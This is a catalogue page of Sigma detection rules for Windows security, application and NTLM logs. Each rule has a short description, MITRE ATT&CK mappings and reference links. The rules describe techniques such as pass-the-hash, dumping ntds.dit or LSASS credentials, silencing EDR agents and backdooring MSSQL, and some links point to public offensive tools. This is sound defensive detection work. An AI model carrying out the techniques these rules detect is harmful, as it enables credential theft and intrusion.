https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html

https://twitter.com/SBousseaden/status/1490608838701166596

https://www.x86matthew.com/view_post?id=create_svc_rpc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml

Enabled User Right in AD to Control User Objects

Detects the scenario in which a user is assigned the SeEnableDelegationPrivilege right in Active Directory, which would allow control of other AD user objects.

The tag is: misp-galaxy:sigma-rules="Enabled User Right in AD to Control User Objects"

Enabled User Right in AD to Control User Objects has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9084. Table References

Links

https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml

Win Susp Computer Name Containing Samtheadmin

Detects the suspicious computer name samtheadmin-{1..100}$ generated by a hacktool

The tag is: misp-galaxy:sigma-rules="Win Susp Computer Name Containing Samtheadmin"

Win Susp Computer Name Containing Samtheadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9085. Table References

Links

https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py

https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py

https://twitter.com/malmoeb/status/1511760068743766026

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml

Suspicious Scheduled Task Update

Detects an update to a scheduled task event that contains suspicious keywords.

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Update"

Suspicious Scheduled Task Update has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9086. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml

DCOM InternetExplorer.Application Iertutil DLL Hijack - Security

Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="DCOM InternetExplorer.Application Iertutil DLL Hijack - Security"

DCOM InternetExplorer.Application Iertutil DLL Hijack - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9087. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml

Windows Filtering Platform Blocked Connection From EDR Agent Binary

Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent EDR agents from reporting security events.

The tag is: misp-galaxy:sigma-rules="Windows Filtering Platform Blocked Connection From EDR Agent Binary"

Windows Filtering Platform Blocked Connection From EDR Agent Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9088. Table References

Links

https://github.com/netero1010/EDRSilencer

https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983

https://github.com/amjcyber/EDRNoiseMaker

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml

Pass the Hash Activity 2

Detects the pass-the-hash attack technique, which is used to move laterally inside the network

The tag is: misp-galaxy:sigma-rules="Pass the Hash Activity 2"

Pass the Hash Activity 2 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9090. Table References

Links

https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/

https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events

https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml

Outgoing Logon with New Credentials

Detects logon events that specify new credentials

The tag is: misp-galaxy:sigma-rules="Outgoing Logon with New Credentials"

Outgoing Logon with New Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

Table 9091. Table References

Links

https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml

External Remote SMB Logon from Public IP

Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.

The tag is: misp-galaxy:sigma-rules="External Remote SMB Logon from Public IP"

External Remote SMB Logon from Public IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9093. Table References

Links

https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html

https://twitter.com/Purp1eW0lf/status/1616144561965002752

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml

Failed Logon From Public IP

Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

The tag is: misp-galaxy:sigma-rules="Failed Logon From Public IP"

Failed Logon From Public IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 9094. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml

RDP Login from Localhost

An RDP login with a localhost source address may be a tunnelled login

The tag is: misp-galaxy:sigma-rules="RDP Login from Localhost"

RDP Login from Localhost has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9095. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml

A Security-Enabled Global Group Was Deleted

Detects activity when a security-enabled global group is deleted

The tag is: misp-galaxy:sigma-rules="A Security-Enabled Global Group Was Deleted"

A Security-Enabled Global Group Was Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9096. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml

Successful Account Login Via WMI

Detects successful logon attempts performed with WMI

The tag is: misp-galaxy:sigma-rules="Successful Account Login Via WMI"

Successful Account Login Via WMI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9097. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml

Potential Access Token Abuse

Detects potential token impersonation and theft, for example when "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" are used with the "LOGON32_LOGON_NEW_CREDENTIALS" flag.

The tag is: misp-galaxy:sigma-rules="Potential Access Token Abuse"

Potential Access Token Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

Table 9098. Table References

Links

https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html

https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml

A Member Was Removed From a Security-Enabled Global Group

Detects activity when a member is removed from a security-enabled global group

The tag is: misp-galaxy:sigma-rules="A Member Was Removed From a Security-Enabled Global Group"

A Member Was Removed From a Security-Enabled Global Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9099. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml

RottenPotato Like Attack Pattern

Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like

The tag is: misp-galaxy:sigma-rules="RottenPotato Like Attack Pattern"

RottenPotato Like Attack Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 9100. Table References

Links

https://twitter.com/SBousseaden/status/1195284233729777665

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml

Remote WMI ActiveScriptEventConsumers

Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network

The tag is: misp-galaxy:sigma-rules="Remote WMI ActiveScriptEventConsumers"

Remote WMI ActiveScriptEventConsumers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9101. Table References

Links

https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml

Scanner PoC for CVE-2019-0708 RDP RCE Vuln

Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep

The tag is: misp-galaxy:sigma-rules="Scanner PoC for CVE-2019-0708 RDP RCE Vuln"

Scanner PoC for CVE-2019-0708 RDP RCE Vuln has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 9102. Table References

Links

https://twitter.com/AdamTheAnalyst/status/1134394070045003776

https://github.com/zerosum0x0/CVE-2019-0708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml

External Remote RDP Logon from Public IP

Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.

The tag is: misp-galaxy:sigma-rules="External Remote RDP Logon from Public IP"

External Remote RDP Logon from Public IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9103. Table References

Links

https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html

https://twitter.com/Purp1eW0lf/status/1616144561965002752

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml

Successful Overpass the Hash Attempt

Detects a successful logon with logon type 9 (NewCredentials), which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module.

The tag is: misp-galaxy:sigma-rules="Successful Overpass the Hash Attempt"

Successful Overpass the Hash Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9104. Table References

Links

https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml

A Member Was Added to a Security-Enabled Global Group

Detects activity when a member is added to a security-enabled global group

The tag is: misp-galaxy:sigma-rules="A Member Was Added to a Security-Enabled Global Group"

A Member Was Added to a Security-Enabled Global Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9105. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml

Admin User Remote Logon

Detects remote login by the Administrator user (depending on the internal pattern).

The tag is: misp-galaxy:sigma-rules="Admin User Remote Logon"

Admin User Remote Logon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 9106. Table References

Links

https://car.mitre.org/wiki/CAR-2016-04-005

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml

Certificate Exported From Local Certificate Store

Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.

The tag is: misp-galaxy:sigma-rules="Certificate Exported From Local Certificate Store"

Certificate Exported From Local Certificate Store has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 9107. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml

NTLM Brute Force

Detects common NTLM brute force device names

The tag is: misp-galaxy:sigma-rules="NTLM Brute Force"

NTLM Brute Force has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9108. Table References

Links

https://www.varonis.com/blog/investigate-ntlm-brute-force

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml

NTLM Logon

Detects logons using NTLM, which could be caused by a legacy source or by attackers

The tag is: misp-galaxy:sigma-rules="NTLM Logon"

NTLM Logon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9109. Table References

Links

https://twitter.com/JohnLaTwC/status/1004895028995477505

https://goo.gl/PsqrhT

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml

Potential Remote Desktop Connection to Non-Domain Host

Detects logons using NTLM to hosts that are potentially not part of the domain.

The tag is: misp-galaxy:sigma-rules="Potential Remote Desktop Connection to Non-Domain Host"

Potential Remote Desktop Connection to Non-Domain Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9110. Table References

Links

n/a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml

Ntdsutil Abuse

Detects potential abuse of ntdsutil to dump the ntds.dit database

The tag is: misp-galaxy:sigma-rules="Ntdsutil Abuse"

Ntdsutil Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9112. Table References

Links

https://twitter.com/mgreen27/status/1558223256704122882

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml

Audit CVE Event

Detects events generated by user-mode applications when they call the CveEventWrite API because a known vulnerability is being exploited. Microsoft started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.

The tag is: misp-galaxy:sigma-rules="Audit CVE Event"

Audit CVE Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

Table 9113. Table References

Links

https://nullsec.us/windows-event-log-audit-cve/

https://twitter.com/FlemmingRiis/status/1217147415482060800

https://twitter.com/VM_vivisector/status/1217190929330655232

https://www.youtube.com/watch?v=ebmW42YYveI

https://twitter.com/DidierStevens/status/1217533958096924676

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml

Backup Catalog Deleted

Detects backup catalog deletions

The tag is: misp-galaxy:sigma-rules="Backup Catalog Deleted"

Backup Catalog Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 9114. Table References

Links

https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100

https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml

Microsoft Malware Protection Engine Crash - WER

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

The tag is: misp-galaxy:sigma-rules="Microsoft Malware Protection Engine Crash - WER"

Microsoft Malware Protection Engine Crash - WER has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9115. Table References

Links

https://technet.microsoft.com/en-us/library/security/4022344

https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml

Microsoft Malware Protection Engine Crash

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

The tag is: misp-galaxy:sigma-rules="Microsoft Malware Protection Engine Crash"

Microsoft Malware Protection Engine Crash has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9116. Table References

Links

https://technet.microsoft.com/en-us/library/security/4022344

https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_application_msmpeng_crash_error.yml

Potential Credential Dumping Via WER - Application

Detects a Windows Error Reporting event where the crashed process is lsass. This could be the result of an intentional crash by techniques such as Lsass-Shtinkering to dump credentials.

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via WER - Application"

Potential Credential Dumping Via WER - Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9117. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml

Restricted Software Access By SRP

Detects restricted access to applications by the Software Restriction Policies (SRP) policy

The tag is: misp-galaxy:sigma-rules="Restricted Software Access By SRP"

Restricted Software Access By SRP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 9118. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv

https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml

Relevant Anti-Virus Signature Keywords In Application Log

Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.

The tag is: misp-galaxy:sigma-rules="Relevant Anti-Virus Signature Keywords In Application Log"

Relevant Anti-Virus Signature Keywords In Application Log has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588" with estimative-language:likelihood-probability="almost-certain"

Table 9119. Table References

Links

https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01

https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31

https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml

Remote Access Tool - ScreenConnect File Transfer

Detects a file being transferred via ScreenConnect RMM

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect File Transfer"

Remote Access Tool - ScreenConnect File Transfer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9120. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml

Remote Access Tool - ScreenConnect Command Execution

Detects command execution via ScreenConnect RMM

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Command Execution"

Remote Access Tool - ScreenConnect Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9121. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml

Atera Agent Installation

Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators

The tag is: misp-galaxy:sigma-rules="Atera Agent Installation"

Atera Agent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9122. Table References

Links

https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml

MSI Installation From Web

Detects installation of a remote MSI file from the web.

The tag is: misp-galaxy:sigma-rules="MSI Installation From Web"

MSI Installation From Web has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 9124. Table References

Links

https://twitter.com/st0pp3r/status/1583922009842802689

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml

Application Uninstalled

An application has been removed. Check if it is critical.

The tag is: misp-galaxy:sigma-rules="Application Uninstalled"

Application Uninstalled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 9125. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/msi/event-logging

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml

MSSQL Server Failed Logon

Detects failed logon attempts from clients to MSSQL server.

The tag is: misp-galaxy:sigma-rules="MSSQL Server Failed Logon"

MSSQL Server Failed Logon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9126. Table References

Links

https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html

https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml

MSSQL SPProcoption Set

Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started.

The tag is: misp-galaxy:sigma-rules="MSSQL SPProcoption Set"

Table 9127. Table References

Links

https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16

https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml

MSSQL Server Failed Logon From External Network

Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.

The tag is: misp-galaxy:sigma-rules="MSSQL Server Failed Logon From External Network"

MSSQL Server Failed Logon From External Network has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9129. Table References

Links

https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html

https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml

MSSQL Add Account To Sysadmin Role

Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role

The tag is: misp-galaxy:sigma-rules="MSSQL Add Account To Sysadmin Role"

Table 9131. Table References

Links

https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml

Scheduled Task Executed Uncommon LOLBIN

Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executed Uncommon LOLBIN"

Scheduled Task Executed Uncommon LOLBIN has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9133. Table References

Links

Internal Research

